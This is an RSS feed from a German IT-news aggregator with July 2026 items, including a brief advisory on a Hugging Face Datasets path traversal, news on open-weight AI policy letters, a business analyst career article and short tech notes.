<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=opensource+resume+builders+thatll%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Thu, 30 Jul 2026 03:09:57 +0200</lastBuildDate>
<pubDate>Thu, 30 Jul 2026 03:09:57 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=opensource+resume+builders+thatll%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=opensource+resume+builders+thatll%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[CVE-2026-66007 | Hugging Face Datasets up to 5.0.0 Folder-based Dataset Builders file_name path traversal (EUVD-2026-48613)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in Hugging Face Datasets up to 5.0.0. This affects an unknown function of the component Folder-based Dataset Builders. Such manipulation of the argument file_name leads to path traversal.

This vulnerability is referenced as CVE-2026-66...]]></description>
<link>https://tsecurity.de/de/3694810/sicherheitsluecken/cve-2026-66007-hugging-face-datasets-up-to-500-folder-based-dataset-builders-filename-path-traversal-euvd-2026-48613/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694810/sicherheitsluecken/cve-2026-66007-hugging-face-datasets-up-to-500-folder-based-dataset-builders-filename-path-traversal-euvd-2026-48613/</guid>
<pubDate>Sat, 25 Jul 2026 20:05:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/hugging_face:datasets">Hugging Face Datasets up to 5.0.0</a>. This affects an unknown function of the component <em>Folder-based Dataset Builders</em>. Such manipulation of the argument <em>file_name</em> leads to path traversal.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-66007">CVE-2026-66007</a>. It is possible to launch the attack remotely. No exploit is available.

It is advisable to implement a patch to correct this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[LUG: LinOs Fürstenfeldbruck]]></title>
<description><![CDATA[Wir sind ein Stammtisch von Linux & OpenSource Freunden, die sich im Regelfall 1x im Monat zusammensetzen und austauschen. 2 weitere Donnerstage im Monat sind für Installationshilfen und OpenSource geplant. Interessierte Menschen und Neulinge sind herzlich willkommen, wir helfen gern beim Umstieg.]]></description>
<link>https://tsecurity.de/de/3693204/it-nachrichten/lug-linos-fuerstenfeldbruck/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693204/it-nachrichten/lug-linos-fuerstenfeldbruck/</guid>
<pubDate>Sat, 25 Jul 2026 08:32:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wir sind ein Stammtisch von Linux &amp; OpenSource Freunden, die sich im Regelfall 1x im Monat zusammensetzen und austauschen. 2 weitere Donnerstage im Monat sind für Installationshilfen und OpenSource geplant. Interessierte Menschen und Neulinge sind herzlich willkommen, wir helfen gern beim Umstieg.]]></content:encoded>
</item>
<item>
<title><![CDATA[What is a business analyst? A key role for business-IT efficiency]]></title>
<description><![CDATA[What is a business analyst?



Business analysts (BAs) are responsible for bridging the gap between IT and the business using data analytics to assess processes, determine requirements, and deliver data-driven recommendations and reports to executives and stakeholders.



BAs engage with business...]]></description>
<link>https://tsecurity.de/de/3693087/it-nachrichten/what-is-a-business-analyst-a-key-role-for-business-it-efficiency/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693087/it-nachrichten/what-is-a-business-analyst-a-key-role-for-business-it-efficiency/</guid>
<pubDate>Sat, 25 Jul 2026 06:16:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">What is a business analyst?</h2>



<p class="wp-block-paragraph">Business analysts (BAs) are responsible for bridging the gap between IT and the business using <a href="https://www.cio.com/article/191313/what-is-data-analytics-analyzing-and-managing-data-for-decisions.html">data analytics</a> to assess processes, determine requirements, and deliver data-driven recommendations and reports to executives and stakeholders.</p>



<p class="wp-block-paragraph">BAs engage with business leaders and users to understand how data-driven changes to process, products, services, software, and hardware can improve efficiencies and add value. They must articulate those ideas but also balance them against what’s technologically feasible and financially and functionally reasonable. Depending on the role, a business analyst might work with data sets to improve products, hardware, tools, software, services, or process.</p>



<p class="wp-block-paragraph">The International Institute of Business Analysis (IIBA), a nonprofit professional association, considers the business analyst an agent of change, and says that <a href="https://www.cio.com/article/191157/what-is-business-analytics-using-data-to-predict-business-outcomes.html">business analysis</a> is a disciplined approach to introduce and manage change to organizations, whether they’re for-profit businesses, governments, or nonprofits.</p>



<h2 class="wp-block-heading">Impact of AI on business analyst role</h2>



<p class="wp-block-paragraph">As AI becomes commonplace in the tech industry, business analysts are embracing it as a tool to automate repetitive work in the role. AI tools can be used for workflow and diagramming, process mapping, data analysis, and to automate meeting minutes and transcribe meetings where requirements are established, all designed to speed up the process of analyzing data, creating visuals, and transcribing and writing user stories and acceptance criteria.</p>



<p class="wp-block-paragraph">AI tools can also help identify patterns, insights, and unique data points that might go unnoticed by humans, and allow a faster time to generate insights for organizations.</p>



<p class="wp-block-paragraph">Of course, as with all AI tools, they still require humans to oversee prompts, scripting, and evaluate AI outputs to ensure they’re accurate and valid. While they can’t replace the work of BAs, AI can help them spend more time on thoughtful analysis and decision making, rather than mundane tasks such as gathering and summarizing data, and querying.</p>



<h2 class="wp-block-heading">Business analyst job description</h2>



<p class="wp-block-paragraph">BAs are responsible for creating new models that support business decisions by working closely with finance and IT teams to establish initiatives and strategies aimed at improving revenue and optimizing costs. They need a strong understanding of regulatory and reporting requirements, and have plenty of experience in forecasting, budgeting, and financial analysis combined with knowing KPIs, according to Robert Half Technology.</p>



<p class="wp-block-paragraph">According to Robert Half, a BA’s job description typically includes budgeting and forecasting, planning and monitoring, variance analysis, pricing, reporting, and creating a detailed business analysis in an effort to outline problems, opportunities, and solutions for a business. It also says BAs should be able to define business requirements and report them back to stakeholders.</p>



<p class="wp-block-paragraph">Since BAs are tasked with prioritizing technical and functional requirements, identifying what clients want, and determining what’s feasible to deliver, the role requires a deep understanding of systems, how they function, who’ll need to be involved, and the necessary steps to get everyone on board.  </p>



<p class="wp-block-paragraph">The role is constantly evolving, especially as companies rely more on data to advise business operations. Every company has different issues that a business analyst can address, whether it’s dealing with outdated legacy systems, changing technologies, broken processes, poor client or customer satisfaction, or large, siloed organizations.</p>



<h2 class="wp-block-heading">Business analyst skills</h2>



<p class="wp-block-paragraph">The BA position requires both hard and soft skills, as they need to know how to pull, analyze, and report data trends, share that information with others, and apply it to business goals and needs.</p>



<p class="wp-block-paragraph">Not all BAs need a background in IT if they have a general understanding of how systems, products, and tools work. Alternatively, some have strong IT backgrounds and less experience in business, but are interested in shifting away from IT into this hybrid role, which often acts as a communicator between the business and IT sides of the organization. So having extensive experience in either area can be beneficial for BAs.</p>



<p class="wp-block-paragraph"><a href="https://www.iiba.org/career-resources/new-to-business-analysis/" target="_blank" rel="noreferrer noopener">According to the IIBA</a>, some of the most important skills and experience for a business analyst are:</p>



<ul class="wp-block-list">
<li>Oral and written communication skills</li>



<li>Interpersonal, organizational, facilitation, and consultative skills</li>



<li>Analytical thinking and problem solving</li>



<li>Being detail-oriented and able to deliver a high level of accuracy</li>



<li>Knowledge of business structure</li>



<li>Stakeholder and cost-benefit analysis</li>



<li>Processes modeling</li>



<li>Understanding networks, databases, and other technologies</li>
</ul>



<p class="wp-block-paragraph">For a more in-depth look at what it takes to succeed as a business analyst, click <a href="https://www.cio.com/article/189108/essential-traits-of-elite-business-analysts.html">here</a>.</p>



<h2 class="wp-block-heading">Business analyst salary</h2>



<p class="wp-block-paragraph">The average annual salary for an IT business analyst is $80,692, according to <a href="https://www.payscale.com/research/US/Job=Business_Analyst%2C_IT/Salary" target="_blank" rel="noreferrer noopener">data from PayScale</a>. The highest paid BAs are in New York, where the average salary is 14% higher than the national average. Dallas, Texas, is second, with reported salaries 6.4% higher than the national average, closely followed by Washington, D.C., where salaries are 6.3% higher than the national average.</p>



<p class="wp-block-paragraph">Some skills are in higher demand than others, with the potential to boost salary. According to Payscale, these are associated with higher BA salaries. These skills, and the amount they can boost your salary, include:</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td>Skills</td><td>Salary Boost</td></tr><tr><td>ScrumMaster</td><td>44%</td></tr><tr><td>Microsoft Azure</td><td>30%</td></tr><tr><td>Supply Chain</td><td>27%</td></tr><tr><td>Oracle eBusiness Suite</td><td>25%</td></tr><tr><td>Master Data Management (SAP MDM)</td><td>24%</td></tr><tr><td>SAP Sales and Distribution (SAP SD)</td><td>24%</td></tr><tr><td>Product Support</td><td>18%</td></tr><tr><td>Microsoft Dynamics GP</td><td>18%</td></tr><tr><td>SAP Quality Management (SAP QM)</td><td>18%</td></tr><tr><td>Workday Software</td><td>15%</td></tr></tbody></table> </div></figure>



<p class="wp-block-paragraph">For tips on boosting your salary, click <a href="https://www.cio.com/article/189510/7-steps-business-analysts-can-take-to-earn-more.html">here</a>.</p>



<h2 class="wp-block-heading">Business analyst certifications</h2>



<p class="wp-block-paragraph">Although business analysis is a relatively new discipline in IT, a handful of organizations already offer certifications to help boost your résumé and prove your merit as an analyst. Organizations such as the IIBA, IQBBA, IREB, and PMI each offer their own tailored certifications for business analysis. These include:</p>



<ul class="wp-block-list">
<li>IIBA <a href="https://www.cio.com/article/189169/ecba-certification-an-entry-level-credential-for-business-analysts.html">Entry Certificate in Business Analysis (ECBA)</a></li>



<li>IIBA Certification of Competency in Business Analysis (CCBA)</li>



<li>IIBA Certified Business Analysis Professional (CBAP)</li>



<li>IIBA Agile Analysis Certification (AAC)</li>



<li>IQBBA Certified Foundation Level Business Analyst (CFLBA)</li>



<li>IREB Certified Professional for Requirements Engineering (CPRE)</li>



<li>PMI Professional in Business Analysis (PBA)</li>



<li>Certified Analytics Professional (CAP)</li>
</ul>



<p class="wp-block-paragraph">For more information about how to earn one of these certifications — and how much they cost — click <a href="https://www.cio.com/article/228834/6-business-analyst-certifications-to-advance-your-analytics-career.html">here</a>.</p>



<h2 class="wp-block-heading">Business analytics tools and software</h2>



<p class="wp-block-paragraph">BAs typically rely on software such as Microsoft’s Excel, PowerPoint, and Access, as well as SQL, Google Analytics, and Tableau. These tools help BAs collect and sort data, create graphs, write documents, and design visualizations to explain findings. You won’t necessarily need programming or database skills for a BA position, but if you already have these skills, they won’t hurt. The type of software and tools you’ll need to use, however, will depend on your job title and what the organization requires.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nvidia, Microsoft, Meta Warn Against 'Premature Restrictions' of Open-Weight Models]]></title>
<description><![CDATA[Nvidia, Microsoft, Meta, Palantir, and more than 20 other tech companies signed an open letter urging policymakers not to impose "premature restrictions" on open-weight AI models, warning that broad limits could "stifle competition or drive innovation overseas." CNBC reports: They wrote that open...]]></description>
<link>https://tsecurity.de/de/3692435/it-security-nachrichten/nvidia-microsoft-meta-warn-against-premature-restrictions-of-open-weight-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692435/it-security-nachrichten/nvidia-microsoft-meta-warn-against-premature-restrictions-of-open-weight-models/</guid>
<pubDate>Fri, 24 Jul 2026 22:11:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nvidia, Microsoft, Meta, Palantir, and more than 20 other tech companies signed an open letter urging policymakers not to impose "premature restrictions" on open-weight AI models, warning that broad limits could "stifle competition or drive innovation overseas." CNBC reports: They wrote that open-weight models strengthen competition and ensure that the benefits of the technology are "broadly shared rather than concentrated in a few hands." "Relying solely on closed models is not inherently safe: they can be breached, misused, or fail in ways that outsiders cannot detect," the letter said. "And concentrating advanced AI capabilities behind a small number of closed models compounds that risk."
 
Elon Musk, who runs an AI business under his rocket company SpaceX, also applified the letter on social media, writing that it has his "full support" in a post on X. SpaceX did not officially sign the letter. Greg Brockman, OpenAI's president, said Thursday that the company believes in broad access, and that he has not been involved in any conversations with the Trump administration about potentially banning Chinese open-weight models in the U.S.
 
"I think that, that fundamentally, AI and AI usage is something that is actually very important to democratize," Brockman told reporters during a briefing in New York City. "And so, for me, at a sort of deep level, I think that having more models, more usage, that is a good thing." OpenAI CEO Sam Altman addressed the letter in a post on X on Friday, writing that he wants the U.S. to win with both open-weight and proprietary models, and that he is "glad to see this."
 
[...] In the letter on Friday, the U.S. tech companies said that concerns about unlawful distillation should be addressed through "targeted legal and commercial frameworks" instead of with "sweeping restrictions on techniques that play an important role in AI innovation." "Our AI leadership will be judged not by one frontier AI model, but by whether the United States builds a strong, open ecosystem that diffuses into every sector," the letter said. "This is essential for creating opportunities for innovation and prosperity across the country." The letter follows a separate appeal signed by nearly 200 Silicon Valley companies, including Proton and Y Combinator, warning that restricting U.S. access to Chinese open-weight AI models could cripple the next generation of American startups. "American leadership requires two things: world-leading American open-weight models and continued access for U.S. builders to open models already available worldwide," the startup founders wrote. Instead of broad prohibitions, they argue the government should adopt targeted safeguards.
 
Of course, these signees "have an obvious economic stake in seeing open AI models flourish," notes TechCrunch. "Companies like Nvidia, Microsoft Azure, and other infrastructure providers have a vested interest in pushing for commoditized models: If models are interchangeable, people will buy more GPUs, rent more cloud capacity, and build more applications."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Nvidia%2C+Microsoft%2C+Meta+Warn+Against+'Premature+Restrictions'+of+Open-Weight+Models%3A+https%3A%2F%2Fmeta.slashdot.org%2Fstory%2F26%2F07%2F24%2F1911233%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fmeta.slashdot.org%2Fstory%2F26%2F07%2F24%2F1911233%2Fnvidia-microsoft-meta-warn-against-premature-restrictions-of-open-weight-models%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://meta.slashdot.org/story/26/07/24/1911233/nvidia-microsoft-meta-warn-against-premature-restrictions-of-open-weight-models?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google DeepMind's Demis Hassabis calls for 'urgent action' during 'precious window before AGI arrives' — and it's all starting to feel a bit Skynet]]></title>
<description><![CDATA[Hearing one of AI’s leading builders warn about losing control makes the future feel increasingly Skynet-adjacent.]]></description>
<link>https://tsecurity.de/de/3691913/it-nachrichten/google-deepminds-demis-hassabis-calls-for-urgent-action-during-precious-window-before-agi-arrives-and-its-all-starting-to-feel-a-bit-skynet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691913/it-nachrichten/google-deepminds-demis-hassabis-calls-for-urgent-action-during-precious-window-before-agi-arrives-and-its-all-starting-to-feel-a-bit-skynet/</guid>
<pubDate>Fri, 24 Jul 2026 17:38:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hearing one of AI’s leading builders warn about losing control makes the future feel increasingly Skynet-adjacent.]]></content:encoded>
</item>
<item>
<title><![CDATA[What is a business analyst? A key role for business-IT efficiency]]></title>
<description><![CDATA[What is a business analyst?



Business analysts (BAs) are responsible for bridging the gap between IT and the business using data analytics to assess processes, determine requirements, and deliver data-driven recommendations and reports to executives and stakeholders.



BAs engage with business...]]></description>
<link>https://tsecurity.de/de/3691228/it-security-nachrichten/what-is-a-business-analyst-a-key-role-for-business-it-efficiency/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691228/it-security-nachrichten/what-is-a-business-analyst-a-key-role-for-business-it-efficiency/</guid>
<pubDate>Fri, 24 Jul 2026 12:09:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">What is a business analyst?</h2>



<p class="wp-block-paragraph">Business analysts (BAs) are responsible for bridging the gap between IT and the business using <a href="https://www.cio.com/article/191313/what-is-data-analytics-analyzing-and-managing-data-for-decisions.html">data analytics</a> to assess processes, determine requirements, and deliver data-driven recommendations and reports to executives and stakeholders.</p>



<p class="wp-block-paragraph">BAs engage with business leaders and users to understand how data-driven changes to process, products, services, software, and hardware can improve efficiencies and add value. They must articulate those ideas but also balance them against what’s technologically feasible and financially and functionally reasonable. Depending on the role, a business analyst might work with data sets to improve products, hardware, tools, software, services, or process.</p>



<p class="wp-block-paragraph">The International Institute of Business Analysis (IIBA), a nonprofit professional association, considers the business analyst an agent of change, and says that <a href="https://www.cio.com/article/191157/what-is-business-analytics-using-data-to-predict-business-outcomes.html">business analysis</a> is a disciplined approach to introduce and manage change to organizations, whether they’re for-profit businesses, governments, or nonprofits.</p>



<h2 class="wp-block-heading">Impact of AI on business analyst role</h2>



<p class="wp-block-paragraph">As AI becomes commonplace in the tech industry, business analysts are embracing it as a tool to automate repetitive work in the role. AI tools can be used for workflow and diagramming, process mapping, data analysis, and to automate meeting minutes and transcribe meetings where requirements are established, all designed to speed up the process of analyzing data, creating visuals, and transcribing and writing user stories and acceptance criteria.</p>



<p class="wp-block-paragraph">AI tools can also help identify patterns, insights, and unique data points that might go unnoticed by humans, and allow a faster time to generate insights for organizations.</p>



<p class="wp-block-paragraph">Of course, as with all AI tools, they still require humans to oversee prompts, scripting, and evaluate AI outputs to ensure they’re accurate and valid. While they can’t replace the work of BAs, AI can help them spend more time on thoughtful analysis and decision making, rather than mundane tasks such as gathering and summarizing data, and querying.</p>



<h2 class="wp-block-heading">Business analyst job description</h2>



<p class="wp-block-paragraph">BAs are responsible for creating new models that support business decisions by working closely with finance and IT teams to establish initiatives and strategies aimed at improving revenue and optimizing costs. They need a strong understanding of regulatory and reporting requirements, and have plenty of experience in forecasting, budgeting, and financial analysis combined with knowing KPIs, according to Robert Half Technology.</p>



<p class="wp-block-paragraph">According to Robert Half, a BA’s job description typically includes budgeting and forecasting, planning and monitoring, variance analysis, pricing, reporting, and creating a detailed business analysis in an effort to outline problems, opportunities, and solutions for a business. It also says BAs should be able to define business requirements and report them back to stakeholders.</p>



<p class="wp-block-paragraph">Since BAs are tasked with prioritizing technical and functional requirements, identifying what clients want, and determining what’s feasible to deliver, the role requires a deep understanding of systems, how they function, who’ll need to be involved, and the necessary steps to get everyone on board.  </p>



<p class="wp-block-paragraph">The role is constantly evolving, especially as companies rely more on data to advise business operations. Every company has different issues that a business analyst can address, whether it’s dealing with outdated legacy systems, changing technologies, broken processes, poor client or customer satisfaction, or large, siloed organizations.</p>



<h2 class="wp-block-heading">Business analyst skills</h2>



<p class="wp-block-paragraph">The BA position requires both hard and soft skills, as they need to know how to pull, analyze, and report data trends, share that information with others, and apply it to business goals and needs.</p>



<p class="wp-block-paragraph">Not all BAs need a background in IT if they have a general understanding of how systems, products, and tools work. Alternatively, some have strong IT backgrounds and less experience in business, but are interested in shifting away from IT into this hybrid role, which often acts as a communicator between the business and IT sides of the organization. So having extensive experience in either area can be beneficial for BAs.</p>



<p class="wp-block-paragraph"><a href="https://www.iiba.org/career-resources/new-to-business-analysis/" target="_blank" rel="noreferrer noopener">According to the IIBA</a>, some of the most important skills and experience for a business analyst are:</p>



<ul class="wp-block-list">
<li>Oral and written communication skills</li>



<li>Interpersonal, organizational, facilitation, and consultative skills</li>



<li>Analytical thinking and problem solving</li>



<li>Being detail-oriented and able to deliver a high level of accuracy</li>



<li>Knowledge of business structure</li>



<li>Stakeholder and cost-benefit analysis</li>



<li>Processes modeling</li>



<li>Understanding networks, databases, and other technologies</li>
</ul>



<p class="wp-block-paragraph">For a more in-depth look at what it takes to succeed as a business analyst, click <a href="https://www.cio.com/article/189108/essential-traits-of-elite-business-analysts.html">here</a>.</p>



<h2 class="wp-block-heading">Business analyst salary</h2>



<p class="wp-block-paragraph">The average annual salary for an IT business analyst is $80,692, according to <a href="https://www.payscale.com/research/US/Job=Business_Analyst%2C_IT/Salary" target="_blank" rel="noreferrer noopener">data from PayScale</a>. The highest paid BAs are in New York, where the average salary is 14% higher than the national average. Dallas, Texas, is second, with reported salaries 6.4% higher than the national average, closely followed by Washington, D.C., where salaries are 6.3% higher than the national average.</p>



<p class="wp-block-paragraph">Some skills are in higher demand than others, with the potential to boost salary. According to Payscale, these are associated with higher BA salaries. These skills, and the amount they can boost your salary, include:</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td>Skills</td><td>Salary Boost</td></tr><tr><td>ScrumMaster</td><td>44%</td></tr><tr><td>Microsoft Azure</td><td>30%</td></tr><tr><td>Supply Chain</td><td>27%</td></tr><tr><td>Oracle eBusiness Suite</td><td>25%</td></tr><tr><td>Master Data Management (SAP MDM)</td><td>24%</td></tr><tr><td>SAP Sales and Distribution (SAP SD)</td><td>24%</td></tr><tr><td>Product Support</td><td>18%</td></tr><tr><td>Microsoft Dynamics GP</td><td>18%</td></tr><tr><td>SAP Quality Management (SAP QM)</td><td>18%</td></tr><tr><td>Workday Software</td><td>15%</td></tr></tbody></table> </div></figure>



<p class="wp-block-paragraph">For tips on boosting your salary, click <a href="https://www.cio.com/article/189510/7-steps-business-analysts-can-take-to-earn-more.html">here</a>.</p>



<h2 class="wp-block-heading">Business analyst certifications</h2>



<p class="wp-block-paragraph">Although business analysis is a relatively new discipline in IT, a handful of organizations already offer certifications to help boost your résumé and prove your merit as an analyst. Organizations such as the IIBA, IQBBA, IREB, and PMI each offer their own tailored certifications for business analysis. These include:</p>



<ul class="wp-block-list">
<li>IIBA <a href="https://www.cio.com/article/189169/ecba-certification-an-entry-level-credential-for-business-analysts.html">Entry Certificate in Business Analysis (ECBA)</a></li>



<li>IIBA Certification of Competency in Business Analysis (CCBA)</li>



<li>IIBA Certified Business Analysis Professional (CBAP)</li>



<li>IIBA Agile Analysis Certification (AAC)</li>



<li>IQBBA Certified Foundation Level Business Analyst (CFLBA)</li>



<li>IREB Certified Professional for Requirements Engineering (CPRE)</li>



<li>PMI Professional in Business Analysis (PBA)</li>



<li>Certified Analytics Professional (CAP)</li>
</ul>



<p class="wp-block-paragraph">For more information about how to earn one of these certifications — and how much they cost — click <a href="https://www.cio.com/article/228834/6-business-analyst-certifications-to-advance-your-analytics-career.html">here</a>.</p>



<h2 class="wp-block-heading">Business analytics tools and software</h2>



<p class="wp-block-paragraph">BAs typically rely on software such as Microsoft’s Excel, PowerPoint, and Access, as well as SQL, Google Analytics, and Tableau. These tools help BAs collect and sort data, create graphs, write documents, and design visualizations to explain findings. You won’t necessarily need programming or database skills for a BA position, but if you already have these skills, they won’t hurt. The type of software and tools you’ll need to use, however, will depend on your job title and what the organization requires.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 now supports resuming WhatsApp from Android, but you’ll wait longer for the app to load]]></title>
<description><![CDATA[Windows 11's cross-device Resume feature has reached WhatsApp, letting you tap a taskbar badge to pick up Android chats on your PC. I tested it, and while the idea mirrors Apple's Handoff nicely, WhatsApp's sluggish WebView2 wrapper takes so long to load that picking up your phone is faster.
The ...]]></description>
<link>https://tsecurity.de/de/3690433/windows-tipps/windows-11-now-supports-resuming-whatsapp-from-android-but-youll-wait-longer-for-the-app-to-load/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690433/windows-tipps/windows-11-now-supports-resuming-whatsapp-from-android-but-youll-wait-longer-for-the-app-to-load/</guid>
<pubDate>Fri, 24 Jul 2026 01:31:30 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Windows 11's cross-device Resume feature has reached WhatsApp, letting you tap a taskbar badge to pick up Android chats on your PC. I tested it, and while the idea mirrors Apple's Handoff nicely, WhatsApp's sluggish WebView2 wrapper takes so long to load that picking up your phone is faster.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/07/24/windows-11-now-supports-resuming-whatsapp-from-android-but-youll-wait-longer-for-the-app-to-load/">Windows 11 now supports resuming WhatsApp from Android, but you’ll wait longer for the app to load</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Startup Founders Urge Trump Not to Shut Off Chinese Open Weight AI]]></title>
<description><![CDATA[Nearly 200 Silicon Valley companies, including Proton and Y Combinator, are urging the Trump administration not to block U.S. access to Chinese open-weight AI models or risk crippling the next generation of U.S. startups. Politico reports: On Wednesday, the newly-formed Little Tech Association se...]]></description>
<link>https://tsecurity.de/de/3689670/it-security-nachrichten/startup-founders-urge-trump-not-to-shut-off-chinese-open-weight-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689670/it-security-nachrichten/startup-founders-urge-trump-not-to-shut-off-chinese-open-weight-ai/</guid>
<pubDate>Thu, 23 Jul 2026 18:18:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nearly 200 Silicon Valley companies, including Proton and Y Combinator, are urging the Trump administration not to block U.S. access to Chinese open-weight AI models or risk crippling the next generation of U.S. startups. Politico reports: On Wednesday, the newly-formed Little Tech Association sent letters to President Donald Trump, Commerce Secretary Howard Lutnick and others in the administration with its appeal, marking the first coordinated effort by Silicon Valley's wider influential startup community to weigh in on one of the Trump administration's most closely watched AI debates. At issue: whether Washington should restrict access to increasingly powerful open-weight -- meaning, AI models whose weights are publicly available -- AI models released by Chinese companies such as Moonshot AI and Alibaba.
 
"American leadership requires two things: world-leading American open-weight models and continued access for U.S. builders to open models already available worldwide," the startup founders wrote in the letter (PDF) obtained by POLITICO, also sent to Office of Science and Technology Policy Director Michael Kratsios. Instead of broad prohibitions, they argue the government should adopt targeted safeguards.
 
And they warn that banning Americans from downloading Chinese open-weight models wouldn't stop their proliferation -- but would weaken U.S. startups. "There'll be hundreds of companies that instantly die," said Suhail Doshi, founder of AI infrastructure startup Particle and a member of the association, which POLITICO first wrote about exclusively, in an interview. "It's great for Anthropic. We're all going to have to spend money on Anthropic." Last week, the Beijing-based AI company "Moonshot" released a massive new model that reset the AI race overnight, immediately vaulting into the top tier of global AI, beating Anthropic's Fable 5 and OpenAI's GPT-5.6 Sol in front-end coding tests. 
China's Xi Jinping also used his first appearance at China's World AI Conference to promote a vision of low-cost, broadly accessible AI and call for international cooperation rather than technological rivalry.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Startup+Founders+Urge+Trump+Not+to+Shut+Off+Chinese+Open+Weight+AI%3A+https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F23%2F0623233%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F23%2F0623233%2Fstartup-founders-urge-trump-not-to-shut-off-chinese-open-weight-ai%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/26/07/23/0623233/startup-founders-urge-trump-not-to-shut-off-chinese-open-weight-ai?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This $40 resume tool tailors any job application in minutes]]></title>
<description><![CDATA[DashResume helps you build ATS-friendly resumes, optimize applications for specific jobs and create unlimited cover letters.
(via Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.)]]></description>
<link>https://tsecurity.de/de/3689203/ios-mac-os/this-40-resume-tool-tailors-any-job-application-in-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689203/ios-mac-os/this-40-resume-tool-tailors-any-job-application-in-minutes/</guid>
<pubDate>Thu, 23 Jul 2026 15:33:57 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
